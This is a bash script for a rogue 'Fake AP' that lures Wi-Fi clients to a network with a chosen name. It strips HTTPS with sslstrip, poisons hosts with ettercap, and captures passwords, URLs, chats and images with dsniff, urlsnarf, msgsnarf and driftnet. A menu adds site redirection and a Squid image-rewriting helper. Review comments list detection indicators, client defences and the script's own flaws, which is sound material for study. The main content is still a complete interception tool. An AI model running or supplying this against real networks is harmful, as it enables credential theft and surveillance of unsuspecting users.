#!/bin/bash
# Rogue access point ("Fake AP") traffic-interception script for an older
# Debian/Ubuntu-style host (apt-get, squid3, dhcpd3, ifconfig/route, init.d).
#
# Flow, as written below:
#   1. install Apache2, ImageMagick and Squid3 when their binaries are absent;
#   2. create working directories under /root/Fake_AP;
#   3. prompt for the uplink interface, the monitor-mode interface and an ESSID;
#   4. start airbase-ng, address at0 as 10.0.0.1/24, NAT out through the
#      uplink and serve DHCP leases on at0;
#   5. start ettercap, sslstrip, urlsnarf and dsniff in xterm windows;
#   6. loop on a text menu (log viewers, msgsnarf, driftnet, per-site redirect,
#      image rewriting through Squid, help, shutdown).
#
# Every step touches root-only state (/root, /var/run, /proc/sys, iptables,
# init scripts), so the script presumably expects to run as root.
#
# Values fixed in this file that a wireless IDS or a client-side check can key
# on: channel 6, subnet 10.0.0.0/24 with router 10.0.0.1, lease pool
# 10.0.0.100-10.0.0.254, at0 MTU 1400, DNS server option set to the uplink's
# default gateway.
#
# Client exposure depends on joining an open network by name and on traffic
# that is still sent as plain HTTP; HSTS / HTTPS-only settings, strict
# certificate validation and not auto-joining open ESSIDs are the relevant
# controls.
#
# Host-side review notes (details at each site below):
#   - user input ($wlan, $website) reaches root commands unquoted and
#     unvalidated;
#   - the existing iptables ruleset is flushed and never restored;
#   - /var/run/dhcpd.pid is made world-writable, /var/www is chmod'ed 1777;
#   - squid.conf lines 39 and 40 are overwritten by position;
#   - there is no error checking: a failed step does not stop the script.

# Colored dialogs
# END selects bold white (1;37) rather than resetting attributes.
GREEN="\033[1;32m"
RED="\033[1;31m"
END="\033[1;37m"

clear
echo -e "For this to run please ensue that you know what "
echo 'card is connected to the internet'
echo 'and what card is in Monitor mode'
echo

# Download and install Apache2 only if it isn't installed
# Presence is decided by the two binary paths, not by the package database.
if [ -f /usr/sbin/apache2 ] && [ -f /usr/sbin/apache2ctl ];then
  echo -e ""$GREEN"Apache2 (Web server) found in your system"$END""
  echo;else
  echo -e ""$RED"Installing Apache2 - Web server"$END""
  apt-get install -y apache2 apache2-mpm-prefork apache2.2-common
  echo
  # Package versions the author recorded at the time:
  # apache2 2.2.9-7ubuntu3.2 [45.1kB]
  # apache2.2-common 2.2.9-7ubuntu3.2 [778kB]
  # apache2-mpm-prefork 2.2.9-7ubuntu3.2 [236kB]
fi

# Download and install Mogrify only if it isn't installed
if [ -f /usr/bin/mogrify ];then
  echo -e ""$GREEN"ImageMagick's Mogrify found in your system"$END"";else
  echo -e ""$RED"Installing ImageMagick"$END""
  apt-get install -y imagemagick
fi

# Download and install Squid3 only if it isn't installed
if [ -f /usr/sbin/squid3 ];then
  echo -e ""$GREEN"Squid3 (Proxy caching server for web clients)"
  echo -e "found in your system"$END""
  echo;else
  echo -e ""$RED"Installing Squid3 - Proxy caching server for web clients"$END""
  apt-get install -y squid3 squid3-common
  # Package versions the author recorded at the time:
  # squid3-common 3.0.STABLE7-1ubuntu1 [225kB]
  # squid3 3.0.STABLE7-1ubuntu1 [873kB]
fi

echo 'Setting up the folders...'
echo
# Working tree: HOME_DIR holds dhcpd.conf, TMP_DIR receives driftnet output,
# DAY_DIR is a per-run folder named from the start date and time.
# TMP_DIR already ends in "/", which the later "$TMP_DIR*.*" glob relies on.
# REDIR tracks whether menu option 5 currently has a redirect active.
export HOME_DIR="/root/Fake_AP"
export TMP_DIR="/root/Fake_AP/tmp/"
export DAY_DIR=$HOME_DIR"/$(date +%d-%m-%y_%T)"
export REDIR="off"

# Making working and backup directory
# TMP_DIR is only created together with HOME_DIR; if HOME_DIR exists but tmp/
# was removed, nothing recreates it.
if [ ! -d $HOME_DIR ];then
  mkdir $HOME_DIR
  mkdir $TMP_DIR
fi
# NOTE(review): mode 777 lets any local user rewrite the pid file of a
# root-run daemon; nothing later tightens or removes it.
touch /var/run/dhcpd.pid && chmod 777 /var/run/dhcpd.pid
# One log folder per tool inside the per-run directory.
mkdir $DAY_DIR
mkdir $DAY_DIR"/DriftNet"
mkdir $DAY_DIR"/Dsniff"
mkdir $DAY_DIR"/Ettercap"
mkdir $DAY_DIR"/SslStrip"

# Uplink interface name. NOTE(review): used unquoted and unvalidated in
# ifconfig and iptables invocations below.
echo -n "Enter the name of the wireless card that is connected to the internet, for example:- wlan0: "
read -e wlan
# GATEWAY: second column of the "default" line(s) printed by route.
# IPADD: address parsed from the legacy "inet addr:" ifconfig output format;
# it ends up empty if ifconfig prints a different format.
export GATEWAY="`/sbin/route | grep 'default'| awk '{print $2}'`"
export IPADD="`/sbin/ifconfig $wlan| grep 'inet addr' | awk '{print $2}' | sed -e 's/.*://'`"
echo -n "Enter the name of the wireless card that is in monitor mode, for example:- ath0: "
read -e MON
echo -n "Enter the ESSID you would like your rogue AP to be called, for example:- Free WiFi: "
read -e AP
modprobe tun
#airbase-ng is going to create our fake AP with the SSID we specified
# Started in its own xterm on channel 6; the sleep gives it time to bring up
# the at0 interface that the following commands configure.
xterm -bg black -fg yellow -e airbase-ng -c 6 -e "$AP" $mon &
sleep 3
# The messages below say "airdrop-ng"; the process started above is airbase-ng.
echo Configuring interface created by airdrop-ng
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface...'
echo
# NOTE(review): this discards every existing filter and nat rule and chain on
# the host and sets the FORWARD policy to ACCEPT; the previous ruleset is not
# saved anywhere, so it cannot be restored at exit.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
# Source-NAT everything leaving through the uplink interface.
iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE
echo 'Creating a dhcpd.conf to assign addresses to clients that connect to us...'
echo
# The config is rebuilt from scratch on every run (first line uses ">").
# Clients receive 10.0.0.100-254, router 10.0.0.1 and the uplink's default
# gateway as DNS server.
echo "default-lease-time 600;" > $HOME_DIR/dhcpd.conf
echo "max-lease-time 720;" >> $HOME_DIR/dhcpd.conf
echo "ddns-update-style none;" >> $HOME_DIR/dhcpd.conf
echo "authoritative;" >> $HOME_DIR/dhcpd.conf
echo "log-facility local7;" >> $HOME_DIR/dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> $HOME_DIR/dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;" >> $HOME_DIR/dhcpd.conf
echo "option routers 10.0.0.1;" >> $HOME_DIR/dhcpd.conf
echo "option domain-name-servers $GATEWAY;" >> $HOME_DIR/dhcpd.conf
echo "}" >> $HOME_DIR/dhcpd.conf
echo 'DHCP server starting on our airdrop-ng interface (at0)'
echo
# dhcpd3 runs in the foreground (-f) inside its own xterm, bound to at0.
xterm -bg black -fg blue -e dhcpd3 -f -cf $HOME_DIR/dhcpd.conf at0 &
echo "Launching DHCP entries log"
echo
xterm -bg black -fg red -e tail -f /var/log/messages &
echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
echo
# ettercap on at0, logging to $DAY_DIR/Ettercap/ettercap (menu option 1 reads
# the .eci file from that prefix).
xterm -bg black -fg white -e ettercap -T -q -p -l $DAY_DIR/Ettercap/ettercap -i at0 // // &
sleep 8
echo 'Configuring ip forwarding'
echo
# NOTE(review): kernel forwarding is switched on here and is not switched off
# again by the exit branch of the menu.
echo "1" > /proc/sys/net/ipv4/ip_forward
echo 'Launching various tools'
# Each tool gets its own xterm; sslstrip and dsniff write into the per-run
# directory, urlsnarf only prints to its window.
xterm -rightbar -bg black -fg green -e sslstrip -a -k -f --write $DAY_DIR/SslStrip/ssl.log &
xterm -rightbar -bg black -fg green -e urlsnarf -i at0 &
xterm -rightbar -bg black -fg green -e dsniff -m -i at0 -d -w $DAY_DIR/Dsniff/dsniff.log &
sleep 5
echo

# showMenu: clear the screen and print the status header plus the eight menu
# entries.
# Globals read: RED, END, AP, IPADD, GATEWAY, REDIR, website.
# Entry 5 is labelled according to REDIR ("off" -> enable, "on" -> disable).
showMenu () {
  clear
  echo
  echo ""
  echo -e " Fake AP Name: ""$RED"$AP"$END"
  echo -e " IP Address: "$RED"$IPADD""$END"
  echo -e " Gateway: "$RED"$GATEWAY""$END"
  if [ "$REDIR" == "on" ];then
    echo -e " $website being redirected to /Var/www/index.html"
  fi
  echo ""
  echo ""
  echo " 1) Read Ettercap Log"
  echo " 2) Read DSniff Log"
  echo " 3) Start MSN Logger"
  echo " 4) Start DriftNet"
  if [ "$REDIR" == "off" ];then
    echo " 5) Redirect"
  elif [ "$REDIR" == "on" ];then
    echo " 5) Turn Redirect Off"
  fi
  echo " 6) Flip Images Upside down"
  echo " 7) Help"
  echo " 8) Exit"
  echo
}

# Main loop: redraw the menu, read one choice, dispatch. Only option 8 leaves
# the loop (via exit 0); unrecognised input just redraws the menu.
while [ 1 ]
do
  showMenu
  read CHOICE
  case "$CHOICE" in
    "1")
      # View the ettercap log with etterlog in a konsole window (blocks the
      # menu until that window is closed, since it is not backgrounded).
      echo "Loading up the Ettercap Log";
      konsole --noclose -T "Etterlog" -e etterlog -p $DAY_DIR/Ettercap/ettercap.eci
      ;;
    "2")
      # Replay the dsniff capture file in a konsole window (also foreground).
      echo "Loading up the DSniff Log";
      konsole --noclose -T "DSniff" -e dsniff -r $DAY_DIR/Dsniff/dsniff.log
      ;;
    "3")
      xterm -T "IM Chat" -e msgsnarf -i at0 &
      ;;
    "4")
      # driftnet output goes to TMP_DIR; option 8 moves it into DAY_DIR.
      xterm -rightbar -bg black -fg green -e driftnet -v -a -i at0 -d $TMP_DIR/ &
      ;;
    "5")
      # Toggle the per-site redirect.
      if [ "$REDIR" == "off" ];then
        clear
        echo -n "Enter the Website to set as target: "
        read -e website
        # NOTE(review): $website is free-form input passed unquoted to
        # iptables as root; an empty or multi-word value changes the command
        # line instead of being rejected.
        # The rule DNATs TCP/80 traffic for that destination to the local
        # Apache on 10.0.0.1:80.
        iptables -t nat -A PREROUTING -p tcp -d $website --dport 80 -j DNAT --to 10.0.0.1:80
        /etc/init.d/apache2 start
        export REDIR="on"
        echo ""
        echo "Done..."
        echo ""
        echo "All requests for $website will now be redirected to 10.0.0.1/index.html"
        sleep 5
      elif [ "$REDIR" == "on" ];then
        /etc/init.d/apache2 stop
        # Turning the redirect off flushes ALL rules, including anything
        # option 6 added, then re-adds only the MASQUERADE rule.
        iptables --flush
        iptables --table nat --flush
        iptables --delete-chain
        iptables --table nat --delete-chain
        iptables -P FORWARD ACCEPT
        iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE
        export REDIR="off"
      fi
      ;;
    "6")
      # Install a Squid URL-rewrite helper and route client HTTP through
      # Squid. The helper (written verbatim from the quoted here-document, so
      # the shell expands nothing inside it) reads one line per request; when
      # the line matches .jpg/.gif/.png/.bmp it downloads the captured text
      # with wget into /var/www/images, flips the file with mogrify and prints
      # a 10.0.0.1 URL in its place; any other line is printed back unchanged.
      # wget and mogrify are invoked with list-form system(), so the URL is
      # not interpreted by a shell.
      # NOTE(review): the patterns are unanchored and greedy, so the capture
      # runs from the start of the input line to the last matching extension
      # - TODO confirm against the rewrite-helper input format of the Squid
      # version in use.
      # NOTE(review): the host downloads and parses arbitrary remote image
      # data with ImageMagick; no size, type or count limit is applied and
      # files accumulate until the next run of this option.
      cat > /usr/local/bin/redirect.pl << "EOF"
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while (<>) {
    chomp $_;
    if ($_ =~ /(.*\.jpg)/i) {
        $url = $1;
        system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.jpg", "$url");
        system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.jpg");
        print "http://10.0.0.1/images/$pid-$count.jpg\n";
    }
    elsif ($_ =~ /(.*\.gif)/i) {
        $url = $1;
        system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.gif", "$url");
        system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.gif");
        print "http://10.0.0.1/images/$pid-$count.gif\n";
    }
    elsif ($_ =~ /(.*\.png)/i) {
        $url = $1;
        system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.png", "$url");
        system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.png");
        print "http://10.0.0.1/images/$pid-$count.png\n";
    }
    elsif ($_ =~ /(.*\.bmp)/i) {
        $url = $1;
        system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.bmp", "$url");
        system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.bmp");
        print "http://10.0.0.1/images/$pid-$count.bmp\n";
    }
    else {
        print "$_\n";;
    }
    $count++;
}
EOF
      # Make it executable
      chmod 755 /usr/local/bin/redirect.pl
      # First run: create the image folder and open up the web root.
      # Later runs: just empty the image folder.
      # NOTE(review): chmod -R 1777 makes everything under /var/www
      # world-writable (with the sticky bit), far wider than the image folder
      # needs; www-data is also added to the proxy group.
      if [ ! -d /var/www/images ];then
        mkdir /var/www/images
        chown -R www-data:www-data /var/www
        chmod -R 1777 /var/www
        usermod -aG proxy www-data;else
        rm /var/www/images/*
      fi
      # NOTE(review): these two edits replace whatever is on lines 39 and 40
      # of squid.conf, by position only; on a config that differs from the one
      # the author had, unrelated directives are overwritten. No backup of the
      # original file is kept.
      sed '39s%.*%url_rewrite_program /usr/local/bin/redirect.pl%g' /etc/squid3/squid.conf > /etc/squid3/squid1.conf && mv /etc/squid3/squid1.conf /etc/squid3/squid.conf
      sed '40s%.*%redirect_children 12%g' /etc/squid3/squid.conf > /etc/squid3/squid1.conf && mv /etc/squid3/squid1.conf /etc/squid3/squid.conf
      /etc/init.d/apache2 start
      /etc/init.d/squid3 start
      # Rebuild the ruleset from empty: NAT out via the uplink, accept
      # forwarding from at0, send UDP/53 to the uplink interface's address and
      # hand TCP/80 to Squid on port 3128. Any rule from option 5 is lost
      # here, while REDIR is left unchanged.
      iptables --flush
      iptables --table nat --flush
      iptables --delete-chain
      iptables --table nat --delete-chain
      echo 1 > /proc/sys/net/ipv4/ip_forward
      iptables --table nat --append POSTROUTING --out-interface $wlan -j MASQUERADE
      iptables --append FORWARD --in-interface at0 -j ACCEPT
      iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $IPADD
      #Transparent Squid3
      iptables -t nat -A PREROUTING -i at0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.0.0.1:3128
      iptables -t nat -A PREROUTING -i $wlan -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 3128
      ;;
    "7")
      # Instructions
      # Static help text; the final bare `read` waits for Enter rather than
      # for any key.
      clear
      echo "Instructions"
      echo ""
      echo "This utility is used to create a Fake Access Point."
      echo "it will allow others to connect to the internet through you"
      echo "and allow you to listen in to what they are up to"
      echo ""
      echo "Once it has been run, it will create a new folder at /root/"
      echo "in there it will create a DHCPD.CONF file,A TMP directory for the storage"
      echo "of images from DRIFTNET and a working directoy named with the date and time"
      echo "of the start of the program. when you close the script all images from TMP"
      echo "will be moved into the relavant working directory. this is also where all"
      echo "logs are saved"
      echo ""
      echo "Requirments:-"
      echo "1) You will need to be connected to the internet,either by Lan or Wireless"
      echo "2) Have another wireless card already set in monitor mode"
      echo ""
      echo "How To:-"
      echo "If you are reading this then you should already have the basics set up"
      echo "That being a Fake AP set up with a name of your choice"
      echo "You should be able to have clients connect to it and be issued a IP address"
      echo "There should also be a number of Xterm windows showing different statistics"
      echo "I.e. anything being reported by SSLSTRIP,DSNIFF,URLSNARF,ETTERCAP and DHCP Requests"
      echo ""
      echo "Along with these instructions on the menu, there is options to read the ouput"
      echo "from the Ettercap and Dsniff programs"
      echo ""
      echo "To start MSGSNARF to listen into various chat programs, although im sure this has"
      echo "been set up correctly i have not managed to sniff anything yet"
      echo ""
      echo "DRIFTNET has been included, All images are automatically saved to the TMP folder"
      echo "and moved to the working directory on closure of the script."
      echo ""
      echo "To enable routing."
      echo "Once selected it will ask you for a target website. it will then load up Apache2"
      echo "and redirect any traffic thats destined for the target website to 10.0.0.1. you will"
      echo "you will have to make sure that you have an index.html page in there for it to work "
      echo "or it will come up with a 404 page not found error. I am still working on how to send"
      echo "all traffic to that address, as in a Captive Portal setup"
      echo ""
      echo "Press any key to continue"
      echo -n
      read
      ;;
    "8")
      # Shutdown: archive driftnet output, stop the services, rebuild the
      # minimal NAT ruleset and kill the helper processes.
      # NOTE(review): what this branch leaves behind on the host -
      # ip_forward still 1, FORWARD policy ACCEPT with the MASQUERADE rule
      # re-added, the original firewall rules gone, squid.conf still modified,
      # /usr/local/bin/redirect.pl installed, /var/www world-writable and
      # /var/run/dhcpd.pid mode 777.
      echo "******************************************************************";
      echo "*******Now Shutting Down All Windows********";
      echo "*************And saving logs****************";
      echo "******************************************************************";
      # Only names containing a dot match this glob.
      mv $TMP_DIR*.* $DAY_DIR/DriftNet/
      sleep 3
      #stop the APACHE server
      /etc/init.d/apache2 stop
      #stop squid
      /etc/init.d/squid3 stop
      # reset all IPTABLES
      iptables --flush
      iptables --table nat --flush
      iptables --delete-chain
      iptables --table nat --delete-chain
      iptables -P FORWARD ACCEPT
      iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE
      sleep 3
      # NOTE(review): SIGKILL by process name; this also kills every unrelated
      # xterm (and any other matching process) on the host and gives the tools
      # no chance to flush their logs.
      killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf dsniff xterm ;
      exit 0
      ;;
  esac
done